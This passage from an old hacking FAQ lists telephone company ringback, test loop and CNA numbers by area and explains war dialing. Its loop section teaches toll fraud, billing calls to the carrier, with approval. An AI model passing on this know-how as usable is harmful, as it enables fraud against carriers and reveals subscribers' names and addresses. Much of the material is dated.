201 958 HACKENSACK/JERSEY CITY/NEWARK/PATERSON, NJ
|
|||
|
202 958-XXXX DISTRICT OF COLUMBIA
|
|||
|
203 960 CT (ALL)
|
|||
|
|
|||
|
#hack FAQ (76/2871)
|
|||
|
203 970 CT (ALL)
|
|||
|
205 908-222-2222 BIRMINGHAM, AL
|
|||
|
206 411 WA /* NOT US WEST */
|
|||
|
207 958 ME (ALL)
|
|||
|
209 830 STOCKTON, CA
|
|||
|
212 958 MANHATTAN, NY
|
|||
|
213 114 LOS ANGELES, CA
|
|||
|
213 1223 LOS ANGELES, CA /* SOME 1AESS SWITCHES */
|
|||
|
213 211-2345 LOS ANGELES, CA /* ENGLISH RESPONSE */
|
|||
|
213 211-2346 LOS ANGELES, CA /* DTMF RESPONSE */
|
|||
|
213 61056 LOS ANGELES, CA
|
|||
|
214 790 DALLAS, TX /* GTE */
|
|||
|
214 970-222-2222 DALLAS, TX
|
|||
|
214 970-611-1111 DALLAS, TX /* SOUTHWESTERN BELL */
|
|||
|
215 410-XXXX PHILADELPHIA, PA
|
|||
|
217 200-XXX-XXXX CHAMPAIGN-URBANA/SPRINGFIELD, IL
|
|||
|
301 958-9968 HAGERSTOWN/ROCKVILLE, MD
|
|||
|
305 200-222-2222 FT. LAUDERDALE/KEY WEST/MIAMI, FL
|
|||
|
309 200-XXX-XXXX PEORIA/ROCK ISLAND, IL
|
|||
|
310 114 LONG BEACH, CA /* ON MANY GTE SWITCHES */
|
|||
|
310 1223 LONG BEACH, CA /* SOME 1AESS SWITCHES */
|
|||
|
310 211-2345 LONG BEACH, CA /* ENGLISH RESPONSE */
|
|||
|
|
|||
|
#hack FAQ (76/2893)
|
|||
|
310 211-2346 LONG BEACH, CA /* DTMF RESPONSE */
|
|||
|
312 200 CHICAGO, IL
|
|||
|
312 290 CHICAGO, IL
|
|||
|
312 1-200-8825 CHICAGO, IL (LAST FOUR CHANGE RAPIDLY)
|
|||
|
313 200-200-2002 ANN ARBOR/DEARBORN/DETROIT, MI
|
|||
|
313 200-222-2222 ANN ARBOR/DEARBORN/DETROIT, MI
|
|||
|
313 200-XXX-XXXX ANN ARBOR/DEARBORN/DETROIT, MI
|
|||
|
313 200200200200200 ANN ARBOR/DEARBORN/DETROIT, MI
|
|||
|
314 410-XXXX# COLUMBIA/JEFFERSON CITY/ST.LOUIS, MO
|
|||
|
314 511 COLUMBIA/JEFFERSON CITY/ST.LOUIS, MO
|
|||
|
315 953 SYRACUSE/UTICA, NY
|
|||
|
315 958 SYRACUSE/UTICA, NY
|
|||
|
317 310-222-2222 INDIANAPOLIS/KOKOMO, IN
|
|||
|
317 743-1218 INDIANAPOLIS/KOKOMO, IN
|
|||
|
401 200-200-4444 RI (ALL)
|
|||
|
401 222-2222 RI (ALL)
|
|||
|
402 311 LINCOLN, NE
|
|||
|
404 311 ATLANTA, GA
|
|||
|
404 940-XXX-XXXX ATLANTA, GA
|
|||
|
405 897 ENID/OKLAHOMA CITY, OK
|
|||
|
407 200-222-2222 ORLANDO/WEST PALM BEACH, FL
|
|||
|
408 300-XXX-XXXX SAN JOSE, CA
|
|||
|
|
|||
|
#hack FAQ (76/2915)
|
|||
|
408 760 SAN JOSE, CA
|
|||
|
408 940 SAN JOSE, CA
|
|||
|
409 951 BEAUMONT/GALVESTON, TX
|
|||
|
409 970-XXXX BEAUMONT/GALVESTON, TX
|
|||
|
410 200-6969 ANNAPOLIS/BALTIMORE, MD
|
|||
|
410 200-555-1212 ANNAPOLIS/BALTIMORE, MD
|
|||
|
410 811 ANNAPOLIS/BALTIMORE, MD
|
|||
|
412 711-6633 PITTSBURGH, PA
|
|||
|
412 711-4411 PITTSBURGH, PA
|
|||
|
412 999-XXXX PITTSBURGH, PA
|
|||
|
413 958 PITTSFIELD/SPRINGFIELD, MA
|
|||
|
413 200-555-5555 PITTSFIELD/SPRINGFIELD, MA
|
|||
|
414 330-2234 FOND DU LAC/GREEN BAY/MILWAUKEE/RACINE, WI
|
|||
|
415 200-555-1212 SAN FRANCISCO, CA
|
|||
|
415 211-2111 SAN FRANCISCO, CA
|
|||
|
415 2222 SAN FRANCISCO, CA
|
|||
|
415 640 SAN FRANCISCO, CA
|
|||
|
415 760-2878 SAN FRANCISCO, CA
|
|||
|
415 7600-2222 SAN FRANCISCO, CA
|
|||
|
419 311 TOLEDO, OH
|
|||
|
502 997-555-1212 FRANKFORT/LOUISVILLE/PADUCAH/SHELBYVILLE, KY
|
|||
|
503 611 PORTLAND, OR /* NOT ALL PARTS OF TOWN */
|
|||
|
|
|||
|
#hack FAQ (76/2937)
|
|||
|
508 958 FALL RIVER/NEW BEDFORD/WORCHESTER, MA
|
|||
|
508 200-222-1234 FALL RIVER/NEW BEDFORD/WORCHESTER, MA
|
|||
|
508 200-222-2222 FALL RIVER/NEW BEDFORD/WORCHESTER, MA
|
|||
|
509 560 SPOKANE/WALLA WALLA/YAKIMA, WA
|
|||
|
512 200-222-2222 AUSTIN/CORPUS CHRISTI, TX
|
|||
|
512 830 AUSTIN/CORPUS CHRISTI, TX
|
|||
|
512 970-XXXX AUSTIN/CORPUS CHRISTI, TX
|
|||
|
515 5463 DES MOINES, IA
|
|||
|
516 958 HEMPSTEAD/LONG ISLAND, NY
|
|||
|
516 968 HEMPSTEAD/LONG ISLAND, NY
|
|||
|
517 200-222-2222 BAY CITY/JACKSON/LANSING, MI
|
|||
|
517 200200200200200 BAY CITY/JACKSON/LANSING, MI
|
|||
|
518 997 ALBANY/SCHENECTADY/TROY, NY
|
|||
|
518 998 ALBANY/SCHENECTADY/TROY, NY
|
|||
|
602 593-0809 PHOENIX, AZ
|
|||
|
602 593-6017 PHOENIX, AZ
|
|||
|
602 593-7451 PHOENIX, AZ
|
|||
|
603 200-222-2222 NH (ALL)
|
|||
|
606 997-555-1212 ASHLAND/WINCHESTER, KY
|
|||
|
607 993 BINGHAMTON/ELMIRA, NY
|
|||
|
609 958 ATLANTIC CITY/CAMDEN/TRENTON/VINELAND, NJ
|
|||
|
612 511 MINNEAPOLIS/ST.PAUL, MN
|
|||
|
|
|||
|
#hack FAQ (76/2959)
|
|||
|
615 200200200200200 NASHVILLE, TN
|
|||
|
615 830 NASHVILLE, TN
|
|||
|
616 200-222-2222 BATTLE CREEK/GRAND RAPIDS/KALAMAZOO, MI
|
|||
|
617 200-222-1234 BOSTON, MA
|
|||
|
617 200-222-2222 BOSTON, MA
|
|||
|
617 200-444-4444 BOSTON, MA /* WOBURN, MA */
|
|||
|
617 220-2622 BOSTON, MA
|
|||
|
617 958 BOSTON, MA
|
|||
|
618 200-XXX-XXXX ALTON/CAIRO/MT.VERNON, IL
|
|||
|
703 811 ALEXANDRIA/ARLINGTON/ROANOKE, VA
|
|||
|
708 1-200-8825 CHICAGO/ELGIN, IL (LAST FOUR CHANGE RAPIDLY)
|
|||
|
708 356-9646 CHICAGO/ELGIN, IL
|
|||
|
713 970-XXXX HOUSTON, TX
|
|||
|
714 211-2121 ANAHEIM, CA /* GTE */
|
|||
|
716 511 BUFFALO/NIAGARA FALLS/ROCHESTER, NY /* ROCHESTER TEL */
|
|||
|
717 958 HARRISBURG/SCRANTON/WILKES-BARRE, PA
|
|||
|
718 958 BRONX/BROOKLYN/QUEENS/STATEN ISLAND, NY
|
|||
|
802 2-222-222-2222 VERMONT (ALL)
|
|||
|
802 200-222-2222 VERMONT (ALL)
|
|||
|
805 830 SAN LUIS OBISPO, CA
|
|||
|
806 970-XXXX AMARILLO/LUBBOCK, TX
|
|||
|
810 200200200200200 MICHIGAN
|
|||
|
|
|||
|
#hack FAQ (76/2981)
|
|||
|
812 410-555-1212 EVANSVILLE, IN
|
|||
|
813 311 FT. MEYERS/ST. PETERSBURG/TAMPA, FL
|
|||
|
815 200-XXX-XXXX LA SALLE/ROCKFORD, IL
|
|||
|
815 290 LA SALLE/ROCKFORD, IL
|
|||
|
817 211 FT. WORTH/WACO, TX
|
|||
|
817 970-611-1111 FT. WORTH/WACO, TX /* SOUTHWESTERN BELL */
|
|||
|
818 1223 PASADENA, CA /* SOME 1AESS SWITCHES */
|
|||
|
818 211-2345 PASADENA, CA /* ENGLISH RESPONSE */
|
|||
|
818 211-2346 PASADENA, CA /* DTMF RESPONSE */
|
|||
|
906 1-200-222-2222 MARQUETTE/SAULT STE. MARIE, MI
|
|||
|
908 958 NEW BRUNSWICK, NJ
|
|||
|
910 311 FAYETTEVILLE/GREENSBORO/RALEIGH/WINSTON-SALEM, NC
|
|||
|
910 988 FAYETTEVILLE/GREENSBORO/RALEIGH/WINSTON-SALEM, NC
|
|||
|
914 990-1111 PEEKSKILL/POUGHKEEPSIE/WHITE PLAINS/YONKERS, NY
|
|||
|
915 970-XXXX ABILENE/EL PASO, TX
|
|||
|
919 711 DURHAM, NC
|
|||
|
|
|||
|
CANADA:
|
|||
|
204 644-XXXX MANITOBA
|
|||
|
306 115 SASKATCHEWAN, CANADA
|
|||
|
403 311 ALBERTA, YUKON AND N.W. TERRITORY
|
|||
|
403 908-222-2222 ALBERTA, YUKON AND N.W. TERRITORY
|
|||
|
|
|||
|
#hack FAQ (76/3003)
|
|||
|
403 999 ALBERTA, YUKON AND N.W. TERRITORY
|
|||
|
416 410-XXXX TORONTO, ONTARIO
|
|||
|
416 997-XXXX TORONTO, ONTARIO
|
|||
|
514 320-XXXX MONTREAL, QUEBEC
|
|||
|
519 320-XXXX LONDON, ONTARIO
|
|||
|
604 1116 BRITISH COLUMBIA, CANADA
|
|||
|
604 1211 BRITISH COLUMBIA, CANADA
|
|||
|
604 211 BRITISH COLUMBIA, CANADA
|
|||
|
613 320-2232 OTTAWA, ONTARIO
|
|||
|
705 320-XXXX SAULTE STE. MARIE, ONTARIO
|
|||
|
|
|||
|
AUSTRALIA:
|
|||
|
+61 03-552-4111 VICTORIA 03 AREA
|
|||
|
+61 19123 ALL MAJOR CAPITAL CITIES
|
|||
|
|
|||
|
UNITED KINGDOM:
|
|||
|
175
|
|||
|
|
|||
|
|
|||
|
11. WHAT IS A RINGBACK NUMBER?
|
|||
|
|
|||
|
A RINGBACK NUMBER IS A NUMBER THAT YOU CALL THAT WILL IMMEDIATELY
|
|||
|
|
|||
|
#hack FAQ (76/3025)
|
|||
|
RING THE TELEPHONE FROM WHICH IT WAS CALLED.
|
|||
|
|
|||
|
IN MOST INSTANCES YOU MUST CALL THE RINGBACK NUMBER, QUICKLY HANG UP
|
|||
|
THE PHONE FOR JUST A SHORT MOMENT AND THEN LET UP ON THE SWITCH, YOU
|
|||
|
WILL THEN GO BACK OFF HOOK AND HEAR A DIFFERENT TONE. YOU MAY THEN
|
|||
|
HANG UP. YOU WILL BE CALLED BACK SECONDS LATER.
|
|||
|
|
|||
|
|
|||
|
12. WHAT IS THE RINGBACK NUMBER FOR MY AREA?
|
|||
|
|
|||
|
AN 'X' MEANS INSERT THOSE NUMBERS FROM THE PHONE NUMBER FROM WHICH YOU
|
|||
|
ARE CALLING. A '?' MEANS THAT THE NUMBER VARIES FROM SWITCH TO SWITCH
|
|||
|
IN THE AREA, OR CHANGES FROM TIME TO TIME. TRY ALL POSSIBLE
|
|||
|
COMBINATIONS.
|
|||
|
|
|||
|
IF THE RINGBACK FOR YOUR NPA IS NOT LISTED, TRY COMMON ONES SUCH AS
|
|||
|
954, 957 AND 958. ALSO, TRY USING THE NUMBERS LISTED FOR OTHER NPA'S
|
|||
|
SERVED BY YOUR TELEPHONE COMPANY.
|
|||
|
|
|||
|
201 551-XXXX HACKENSACK/JERSEY CITY/NEWARK/PATERSON, NJ
|
|||
|
202 958-XXXX DISTRICT OF COLUMBIA
|
|||
|
203 991-XXXX CT (ALL)
|
|||
|
|
|||
|
#hack FAQ (76/3047)
|
|||
|
209 890-XXXX STOCKTON, CA
|
|||
|
213 1-95X-XXXX LOS ANGELES, CA
|
|||
|
301 958-XXXX HAGERSTOWN/ROCKVILLE, MD
|
|||
|
303 99X-XXXX GRAND JUNCTION, CO
|
|||
|
312 511-XXXX CHICAGO, IL
|
|||
|
312 511-XXX-XXXX CHICAGO, IL
|
|||
|
312 57?-XXXX CHICAGO, IL
|
|||
|
315 98X-XXXX SYRACUSE/UTICA, NY
|
|||
|
317 777-XXXX INDIANAPOLIS/KOKOMO, IN
|
|||
|
401 98?-XXXX RI (ALL)
|
|||
|
407 988-XXXX ORLANDO/WEST PALM BEACH, FL
|
|||
|
412 985-XXXX PITTSBURGH, PA
|
|||
|
414 977-XXXX FOND DU LAC/GREEN BAY/MILWAUKEE/RACINE, WI
|
|||
|
414 978-XXXX FOND DU LAC/GREEN BAY/MILWAUKEE/RACINE, WI
|
|||
|
415 350-XXXX SAN FRANCISCO, CA
|
|||
|
501 721-XXX-XXXX AR (ALL)
|
|||
|
502 988 LEXINGTON, KY
|
|||
|
504 9988776655 BATON ROUGE/NEW ORLEANS, LA
|
|||
|
512 95X-XXXX AUSTIN, TX
|
|||
|
516 660-XXX-XXXX HEMPSTEAD/LONG ISLAND, NY
|
|||
|
601 777-XXXX MS (ALL)
|
|||
|
609 55?-XXXX ATLANTIC CITY/CAMDEN/TRENTON/VINELAND, NJ
|
|||
|
|
|||
|
#hack FAQ (76/3069)
|
|||
|
616 946-XXXX BATTLE CREEK/GRAND RAPIDS/KALAMAZOO, MI
|
|||
|
619 331-XXXX SAN DIEGO, CA
|
|||
|
619 332-XXXX SAN DIEGO, CA
|
|||
|
703 958-XXXX ALEXANDRIA/ARLINGTON/ROANOKE, VA
|
|||
|
716 981-XXXX ROCHESTER, NY /* ROCHESTER TEL */
|
|||
|
719 99X-XXXX COLORADO SPRINGS/LEADVILLE/PUEBLO, CO
|
|||
|
801 938-XXXX UTAH (ALL)
|
|||
|
801 939-XXXX UTAH (ALL)
|
|||
|
804 260 CHARLOTTESVILLE/NEWPORT NEWS/NORFOLK/RICHMOND, VA
|
|||
|
805 114 BAKERSFIELD/SANTA BARBARA, CA
|
|||
|
813 711 FT. MEYERS/ST. PETERSBURG/TAMPA, FL
|
|||
|
817 971 /* PRESS 2# */
|
|||
|
906 951-XXX-XXXX MARQUETTE/SAULT STE. MARIE, MI
|
|||
|
908 55?-XXXX NEW BRUNSWICK, NJ
|
|||
|
914 660-XXXX PEEKSKILL/POUGHKEEPSIE/WHITE PLAINS/YONKERS, NY
|
|||
|
|
|||
|
CANADA:
|
|||
|
416 57X-XXXX TORONTO, ONTARIO
|
|||
|
416 99X-XXXX TORONTO, ONTARIO
|
|||
|
416 999-XXX-XXXX TORONTO, ONTARIO
|
|||
|
514 320-XXX-XXXX MONTREAL, QUEBEC
|
|||
|
613 999-XXX-XXXX OTTAWA, ONTARIO
|
|||
|
|
|||
|
#hack FAQ (77/3092)
|
|||
|
AUSTRALIA:
|
|||
|
+61 199
|
|||
|
|
|||
|
UNITED KINGDOM:
|
|||
|
174
|
|||
|
|
|||
|
|
|||
|
13. WHAT IS A LOOP?
|
|||
|
|
|||
|
THIS FAQ ANSWER IS EXCERPTED FROM: TONELOC V0.99 USER MANUAL
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BY MINOR THREAT & MUCHO MAAS
|
|||
|
|
|||
|
LOOPS ARE A PAIR OF PHONE NUMBERS, USUALLY CONSECUTIVE, LIKE 836-9998
|
|||
|
AND 836-9999. THEY ARE USED BY THE PHONE COMPANY FOR TESTING. WHAT
|
|||
|
GOOD DO LOOPS DO US? WELL, THEY ARE COOL IN A FEW WAYS. HERE IS A
|
|||
|
SIMPLE USE OF LOOPS. EACH LOOP HAS TWO ENDS, A 'HIGH' END, AND A
|
|||
|
'LOW' END. ONE END GIVES A (USUALLY) CONSTANT, LOUD TONE WHEN IT IS
|
|||
|
CALLED. THE OTHER END IS SILENT. LOOPS DON'T USUALLY RING EITHER.
|
|||
|
|
|||
|
#hack FAQ (77/3114)
|
|||
|
WHEN BOTH ENDS ARE CALLED, THE PEOPLE THAT CALLED EACH END CAN TALK
|
|||
|
THROUGH THE LOOP. SOME LOOPS ARE VOICE FILTERED AND WON'T PASS
|
|||
|
ANYTHING BUT A CONSTANT TONE; THESE AREN'T MUCH USE TO YOU. HERE'S
|
|||
|
WHAT YOU CAN USE WORKING LOOPS FOR: BILLING PHONE CALLS! FIRST, CALL
|
|||
|
THE END THAT GIVES THE LOUD TONE. THEN IF THE OPERATOR OR SOMEONE
|
|||
|
CALLS THE OTHER END, THE TONE WILL GO QUIET. ACT LIKE THE PHONE JUST
|
|||
|
RANG AND YOU ANSWERED IT ... SAY "HELLO", "ALLO", "CHOW", "YO", OR
|
|||
|
WHAT THE FUCK EVER. THE OPERATOR THINKS THAT SHE JUST CALLED YOU, AND
|
|||
|
THAT'S IT! NOW THE PHONE BILL WILL GO TO THE LOOP, AND YOUR LOCAL
|
|||
|
RBOC WILL GET THE BILL! USE THIS TECHNIQUE IN MODERATION, OR THE LOOP
|
|||
|
MAY GO DOWN. LOOPS ARE PROBABLY MOST USEFUL WHEN YOU WANT TO TALK TO
|
|||
|
SOMEONE TO WHOM YOU DON'T WANT TO GIVE YOUR PHONE NUMBER.
|
|||
|
|
|||
|
|
|||
|
14. WHAT IS A LOOP IN MY AREA?
|
|||
|
|
|||
|
MANY OF THESE LOOPS ARE NO LONGER FUNCTIONAL. IF YOU ARE LOCAL
|
|||
|
TO ANY OF THESE LOOPS, PLEASE TRY THEM OUT AN E-MAIL ME THE RESULTS
|
|||
|
OF YOUR RESEARCH.
|
|||
|
|
|||
|
NPA HIGH LOW
|
|||
|
--- -------- --------
|
|||
|
|
|||
|
#hack FAQ (77/3136)
|
|||
|
201 228-9929 228-9930
|
|||
|
201 238-9929 238-9930
|
|||
|
201 251-9929 251-9930
|
|||
|
201 254-9929 254-9930
|
|||
|
201 272-9929 272-9930
|
|||
|
201 330-9929 330-9930
|
|||
|
201 333-9929 333-9930
|
|||
|
201 339-9929 339-9930
|
|||
|
201 347-9929 347-9930
|
|||
|
201 376-9929 376-9930
|
|||
|
201 398-9929 398-9930
|
|||
|
201 467-9929 467-9930
|
|||
|
201 528-9929 528-9930
|
|||
|
201 558-9929 558-9930
|
|||
|
201 559-9929 559-9930
|
|||
|
201 560-9929 560-9930
|
|||
|
201 592-9929 592-9930
|
|||
|
201 625-9929 625-9930
|
|||
|
201 631-9929 631-9930
|
|||
|
201 637-9929 637-9930
|
|||
|
201 655-9929 655-9930
|
|||
|
201 666-9929 666-9930
|
|||
|
|
|||
|
#hack FAQ (77/3158)
|
|||
|
201 690-9929 690-9930
|
|||
|
201 761-9929 761-9930
|
|||
|
201 762-9929 762-9929
|
|||
|
201 762-9929 762-9930
|
|||
|
201 762-9929 762-9929
|
|||
|
201 763-9929 763-9930
|
|||
|
201 764-9929 764-9930
|
|||
|
201 767-9929 767-9930
|
|||
|
201 768-9929 768-9930
|
|||
|
201 773-9929 773-9930
|
|||
|
201 879-9929 879-9930
|
|||
|
201 946-9929 946-9930
|
|||
|
201 992-9929 992-9930
|
|||
|
201 993-9929 993-9930
|
|||
|
201 994-9929 994-9930
|
|||
|
213 360-1118 360-1119
|
|||
|
213 365-1118 365-1119
|
|||
|
213 455-0002 455-XXXX
|
|||
|
213 455-0002 455-XXXX
|
|||
|
213 546-0002 546-XXXX
|
|||
|
213 546-0002 546-XXXX
|
|||
|
305 778-9952 778-9951
|
|||
|
|
|||
|
#hack FAQ (77/3180)
|
|||
|
305 964-9951 964-9952
|
|||
|
312 222-9973 222-9974
|
|||
|
312 234-9973 234-9974
|
|||
|
313 224-9996 224-9997
|
|||
|
313 225-9996 225-9997
|
|||
|
313 234-9996 234-9997
|
|||
|
313 237-9996 237-9997
|
|||
|
313 256-9996 256-9997
|
|||
|
313 272-9996 272-9997
|
|||
|
313 273-9996 273-9997
|
|||
|
313 277-9996 277-9997
|
|||
|
313 281-9996 281-9997
|
|||
|
313 292-9996 292-9997
|
|||
|
313 299-9996 299-9997
|
|||
|
313 321-9996 321-9997
|
|||
|
313 326-9996 326-9997
|
|||
|
313 356-9996 356-9997
|
|||
|
313 362-9996 362-9997
|
|||
|
313 369-9996 369-9997
|
|||
|
313 388-9996 388-9997
|
|||
|
313 397-9996 397-9997
|
|||
|
313 399-9996 399-9997
|
|||
|
|
|||
|
#hack FAQ (77/3202)
|
|||
|
313 445-9996 445-9997
|
|||
|
313 465-9996 465-9997
|
|||
|
313 471-9996 471-9997
|
|||
|
313 474-9996 474-9997
|
|||
|
313 477-9996 477-9997
|
|||
|
313 478-9996 478-9997
|
|||
|
313 483-9996 483-9997
|
|||
|
313 497-9996 497-9997
|
|||
|
313 526-9996 526-9997
|
|||
|
313 552-9996 552-9997
|
|||
|
313 556-9996 556-9997
|
|||
|
313 561-9996 561-9997
|
|||
|
313 569-9996 569-9996
|
|||
|
313 575-9996 575-9997
|
|||
|
313 577-9996 577-9997
|
|||
|
313 585-9996 585-9997
|
|||
|
313 591-9996 591-9997
|
|||
|
313 621-9996 621-9997
|
|||
|
313 626-9996 626-9997
|
|||
|
313 644-9996 644-9997
|
|||
|
313 646-9996 646-9997
|
|||
|
313 647-9996 647-9997
|
|||
|
|
|||
|
#hack FAQ (77/3224)
|
|||
|
313 649-9996 649-9997
|
|||
|
313 663-9996 663-9997
|
|||
|
313 665-9996 665-9997
|
|||
|
313 683-9996 683-9997
|
|||
|
313 721-9996 721-9997
|
|||
|
313 722-9996 722-9997
|
|||
|
313 728-9996 728-9997
|
|||
|
313 731-9996 731-9997
|
|||
|
313 751-9996 751-9997
|
|||
|
313 776-9996 776-9997
|
|||
|
313 781-9996 781-9997
|
|||
|
313 787-9996 787-9997
|
|||
|
313 822-9996 822-9997
|
|||
|
313 833-9996 833-9997
|
|||
|
313 851-9996 851-9997
|
|||
|
313 871-9996 871-9997
|
|||
|
313 875-9996 875-9997
|
|||
|
313 886-9996 886-9997
|
|||
|
313 888-9996 888-9997
|
|||
|
313 898-9996 898-9997
|
|||
|
313 934-9996 934-9997
|
|||
|
313 942-9996 942-9997
|
|||
|
|
|||
|
#hack FAQ (77/3246)
|
|||
|
313 963-9996 963-9997
|
|||
|
313 977-9996 977-9997
|
|||
|
313 995-9996 995-9997
|
|||
|
315 673-9995 673-9996
|
|||
|
315 695-9995 695-9996
|
|||
|
402 422-0001 422-0002
|
|||
|
402 422-0005 422-0006
|
|||
|
402 422-0007 422-0008
|
|||
|
402 422-0003 422-0004
|
|||
|
402 422-0005 422-0006
|
|||
|
402 422-0007 422-0008
|
|||
|
402 422-0009 ALL-PREF
|
|||
|
402 422-0003 422-0004
|
|||
|
402 422-0009 ALL-PREF
|
|||
|
402 422-0001 422-0002
|
|||
|
402 572-0003 572-0004
|
|||
|
517 422-9996 422-9997
|
|||
|
517 423-9996 423-9997
|
|||
|
517 455-9996 455-9997
|
|||
|
517 563-9996 563-9997
|
|||
|
517 663-9996 663-9997
|
|||
|
517 851-9996 851-9997
|
|||
|
|
|||
|
#hack FAQ (77/3268)
|
|||
|
609 921-9929 921-9930
|
|||
|
609 994-9929 994-9930
|
|||
|
616 997-9996 997-9997
|
|||
|
616 ALL-PREF ALL-PREF
|
|||
|
713 224-1499 759-1799
|
|||
|
713 324-1499 324-1799
|
|||
|
713 342-1499 342-1799
|
|||
|
713 351-1499 351-1799
|
|||
|
713 354-1499 354-1799
|
|||
|
713 356-1499 356-1799
|
|||
|
713 442-1499 442-1799
|
|||
|
713 447-1499 447-1799
|
|||
|
713 455-1499 455-1799
|
|||
|
713 458-1499 458-1799
|
|||
|
713 462-1499 462-1799
|
|||
|
713 466-1499 466-1799
|
|||
|
713 468-1499 468-1799
|
|||
|
713 469-1499 469-1799
|
|||
|
713 471-1499 471-1799
|
|||
|
713 481-1499 481-1799
|
|||
|
713 482-1499 482-1799
|
|||
|
713 484-1499 484-1799
|
|||
|
|
|||
|
#hack FAQ (77/3290)
|
|||
|
713 487-1499 487-1799
|
|||
|
713 489-1499 489-1799
|
|||
|
713 492-1499 492-1799
|
|||
|
713 493-1499 493-1799
|
|||
|
713 524-1499 524-1799
|
|||
|
713 526-1499 526-1799
|
|||
|
713 555-1499 555-1799
|
|||
|
713 661-1499 661-1799
|
|||
|
713 664-1499 664-1799
|
|||
|
713 665-1499 665-1799
|
|||
|
713 666-1499 666-1799
|
|||
|
713 667-1499 667-1799
|
|||
|
713 682-1499 976-1799
|
|||
|
713 771-1499 771-1799
|
|||
|
713 780-1499 780-1799
|
|||
|
713 781-1499 997-1799
|
|||
|
713 960-1499 960-1799
|
|||
|
713 977-1499 977-1799
|
|||
|
713 988-1499 988-1799
|
|||
|
714 535-1118 535-1119
|
|||
|
714 538-1118 538-1119
|
|||
|
714 858-1118 858-1119
|
|||
|
|
|||
|
#hack FAQ (77/3312)
|
|||
|
714 879-1118 879-1119
|
|||
|
805 528-0044 528-0045
|
|||
|
805 544-0044 544-0045
|
|||
|
805 773-0044 773-0045
|
|||
|
813 385-9971
|
|||
|
908 776-9930 776-9930
|
|||
|
|
|||
|
|
|||
|
15. WHAT IS A CNA NUMBER?
|
|||
|
|
|||
|
CNA STANDS FOR CUSTOMER NAME AND ADDRESS. THE CNA NUMBER IS A PHONE
|
|||
|
NUMBER FOR TELEPHONE COMPANY PERSONNEL TO CALL AND GET THE NAME AND
|
|||
|
ADDRESS FOR A PHONE NUMBER. IF A TELEPHONE LINEMAN FINDS A PHONE LINE
|
|||
|
HE DOES NOT RECOGNIZE, HE CAN USE THE ANI NUMBER TO FIND IT'S PHONE
|
|||
|
NUMBER AND THEN CALL THE CNA OPERATOR TO SEE WHO OWNS IT AND WHERE
|
|||
|
THEY LIVE.
|
|||
|
|
|||
|
NORMAL CNA NUMBERS ARE AVAILABLE ONLY TO TELEPHONE COMPANY PERSONNEL.
|
|||
|
PRIVATE CITIZENS MAY NOW LEGALLY GET CNA INFORMATION FROM PRIVATE
|
|||
|
COMPANIES. TWO SUCH COMPANIES ARE:
|
|||
|
|
|||
|
UNIDIRECTORY (900)933-3330
|
|||
|
|
|||
|
#hack FAQ (77/3334)
|
|||
|
TELENAME (900)884-1212
|
|||
|
|
|||
|
NOTE THAT THESE ARE 900 NUMBERS, AND WILL COST YOU APPROXIMATELY ONE
|
|||
|
DOLLAR PER MINUTE.
|
|||
|
|
|||
|
IF YOU ARE IN 312 OR 708, AMERITECH HAS A PAY-FOR-PLAY CNA SERVICE
|
|||
|
AVAILABLE TO THE GENERAL PUBLIC. THE NUMBER IS 796-9600. THE COST IS
|
|||
|
$.35/CALL AND CAN LOOK UP TWO NUMBERS PER CALL.
|
|||
|
|
|||
|
|
|||
|
16. WHAT IS THE TELEPHONE COMPANY CNA NUMBER FOR MY AREA?
|
|||
|
|
|||
|
203 203-771-8080 CT (ALL)
|
|||
|
614 614-464-0123 COLUMBUS/STEUBENVILLE, OH
|
|||
|
813 813-270-8711 FT. MEYERS/ST. PETERSBURG/TAMPA, FL
|
|||
|
|
|||
|
|
|||
|
17. WHAT ARE SOME NUMBERS THAT ALWAYS RING BUSY?
|
|||
|
|
|||
|
501 377-99XX AR (ALL)
|
|||
|
719 577-6100 TO 577-6200 COLORADO SPRINGS/LEADVILLE/PUEBLO, CO
|
|||
|
906 632-9999 MARQUETTE/SAULT STE. MARIE, MI
|
|||
|
|
|||
|
#hack FAQ (77/3356)
|
|||
|
906 635-9999 MARQUETTE/SAULT STE. MARIE, MI
|
|||
|
|
|||
|
|
|||
|
18. WHAT ARE SOME NUMBERS THAT TEMPORARILY DISCONNECT PHONE SERVICE?
|
|||
|
|
|||
|
516 480 HEMPSTEAD/LONG ISLAND, NY (60 SECONDS)
|
|||
|
603 980 NH (ALL)
|
|||
|
|
|||
|
|
|||
|
19. WHAT IS SCANNING?
|
|||
|
|
|||
|
SCANNING IS DIALING A LARGE NUMBER OF TELEPHONE NUMBERS IN THE HOPE
|
|||
|
OF FINDING INTERESTING CARRIERS (COMPUTERS) OR TONES.
|
|||
|
|
|||
|
SCANNING CAN BE DONE BY HAND, ALTHOUGH DIALING SEVERAL THOUSAND
|
|||
|
TELEPHONE NUMBERS BY HAND IS EXTREMELY BORING AND TAKES A LONG TIME.
|
|||
|
|
|||
|
MUCH BETTER IS TO USE A SCANNING PROGRAM, SOMETIMES CALLED A WAR
|
|||
|
DIALER OR A DEMON DIALER. CURRENTLY, THE BEST WAR DIALER AVAILABLE
|
|||
|
TO PC-DOS USERS IS TONELOC .99B8.
|
|||
|
|
|||
|
A WAR DIALER WILL DIAL A RANGE OF NUMBERS AND LOG WHAT IT FINDS AT
|
|||
|
|
|||
|
#hack FAQ (77/3378)
|
|||
|
EACH NUMBER. YOU CAN THEN ONLY DIAL UP THE NUMBERS THAT THE WAR
|
|||
|
DIALER MARKED AS CARRIERS OR TONES.
|
|||
|
|
|||
|
|
|||
|
20. IS SCANNING ILLEGAL?
|
|||
|
|
|||
|
EXCERPT FROM: 2600, SPRING 1990, PAGE 27:
|
|||
|
|
|||
|
-BQ-
|
|||
|
IN SOME PLACES, SCANNING HAS BEEN MADE ILLEGAL. IT WOULD BE HARD,
|
|||
|
THOUGH, FOR SOMEONE TO FILE A COMPLAINT AGAINST YOU FOR SCANNING SINCE
|
|||
|
THE WHOLE PURPOSE IS TO CALL EVERY NUMBER ONCE AND ONLY ONCE. IT'S
|
|||
|
NOT LIKELY TO BE THOUGHT OF AS HARASSMENT BY ANYONE WHO GETS A SINGLE
|
|||
|
PHONE CALL FROM A SCANNING COMPUTER. SOME CENTRAL OFFICES HAVE BEEN
|
|||
|
KNOWN TO REACT STRANGELY WHEN PEOPLE START SCANNING. SOMETIMES YOU'RE
|
|||
|
UNABLE TO GET A DIALTONE FOR HOURS AFTER YOU START SCANNING. BUT
|
|||
|
THERE IS NO UNIFORM POLICY. THE BEST THING TO DO IS TO FIRST FIND OUT
|
|||
|
